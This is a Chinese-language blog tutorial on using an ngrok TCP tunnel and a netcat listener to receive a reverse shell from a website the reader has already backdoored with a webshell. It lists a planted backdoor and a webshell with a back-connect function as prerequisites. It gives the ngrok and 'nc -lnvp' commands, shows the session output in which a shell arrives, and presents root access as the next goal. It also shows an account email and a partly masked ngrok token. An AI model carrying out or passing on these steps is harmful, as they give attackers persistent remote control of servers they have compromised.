当前位置:首页干货分享如何使用 ngrok 反向连接服务器

如何使用 ngrok 反向连接服务器

如何使用 ngrok 反向连接服务器

反向连接反向外壳通常是在我们想根服务器以获得“root”访问权限时完成的。但您需要记住,并非所有网站/服务器都可以进行反向连接。但是如果我们尝试一下也无妨。

在本文中,我将讨论的不是如何“生根服务器”,而是我们如何利用Ngrok进行反向连接。要开始peraktik,请先在官方网站上下载Ngrok

所需成分:

  1. Ngrok (根据您的计算机/笔记本电脑的操作系统下载)
  2. 已植入巴克多的网站
  3. 支持“perl”的服务器是必不可少的
  4. 具有反向连接功能的Web外壳

如果您已经准备好了上述所有材料,现在是时候开始开发实践了,如果您没有帐户来验证 ngrok 令牌,请先登录或在此处注册。

Ngrok安装

有关如何安装,它列在 ngrok 下载页面上。因此,您只需要遵循Ngrok推荐的方法即可。现在,它仍然只是对令牌进行身份验证,以便可以运行 Ngrok。

ngrok authtoken 1zmlm6ea3uU1Kleo8MzPSvV36la_7pEBaDCWxxxxxxxxxxxx

或者,如果不清楚,请访问链接:https://dashboard.ngrok.com/get-started/setup

Ngrok配置

然后接下来运行 ngrok tcp,根据需要使用端口。

ngrok tcp 31337

ngrok by @inconshreveable (Ctrl+C to quit) Session Status online Account zidansec@gmail.com (Plan: Free) Version 2.3.40 Region United States (us) Web Interface http://127.0.0.1:4040 Forwarding tcp://0.tcp.ngrok.io:11305 -> localhost:31337 Connections ttl opn rt1 rt5 p50 p90 1 0 0.01 0.00 0.00 0.00

如果 ngrok 进展顺利,那么它看起来像那样。

Netcat配置

当我们想要做反向连接服务器时,Netcat起着非常重要的作用,如果您是linux用户,netcat会自动安装“nc”命令。如果您是窗口用户,则必须首先在此处安装 netcat。由于我使用的是 Linux,那么我将以 Linux 操作系统用户的身份继续本教程。

nc -lnvp 31337

对于 netcat 配置中的端口,请将其调整为您之前运行队列时使用的端口。在这里,我将端口“31337”用于 Ngrok 和 Netcat 配置。

如何反向连接服务器

正确配置 ngrok 和 netcat 后,现在可以执行了。访问你的 backdor,请记住,您正在使用的 webshell 必须具有“反向连接”功能,如果您没有它,您可以使用我上面分享的 webshell。

然后在您正在使用的 webshell 上单击反向连接工具,如果在我上面共享的工具上显示“网络”,那么在服务器上您填写您的转发 ngrok 例如 0.tcp.ngrok.io,对于您填写的端口,porwarding port ngrok 有示例 11305,对于反向连接方法,您可以选择 perl(如果有)。如果没有,你可以使用c,python,php或其他东西。然后单击提交按钮。

如何使用 ngrok 反向连接服务器

然后检查netcat,如果Bckconnect成功,那么它将看起来像这样:


┌─[zidan@ubuntu] ∞ [~]>
└─[$]> nc -lnvp 31337
Listening on 0.0.0.0 31337
Connection received on 127.0.0.1 50912
sh: cannot set terminal process group (3715): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0$

现在我们尝试运行 uname -a 命令来查看目标服务器使用的操作系统信息,或者您可以使用其他命令进行测试。

如何使用 ngrok 反向连接服务器

如果您想在目标服务器上拥有完全访问权限,只需生根服务器,但是我们可以利用的服务器获得完全访问权限的情况非常罕见。下次我会让你如何根服务器。这就是这次的全部教育。

温馨提示:

文章标题:如何使用 ngrok 反向连接服务器

文章链接:https://www.cutrui.cn/300.html

更新时间:2023年02月07日

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
学习笔记干货分享

面向网络管理员的 50 个 Linux 命令

2023-1-13 13:12:25

干货分享

如何使用Weevely反转外壳

2023-1-13 13:32:46

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索

你有新的私信

请务必要查看您的私信哟~~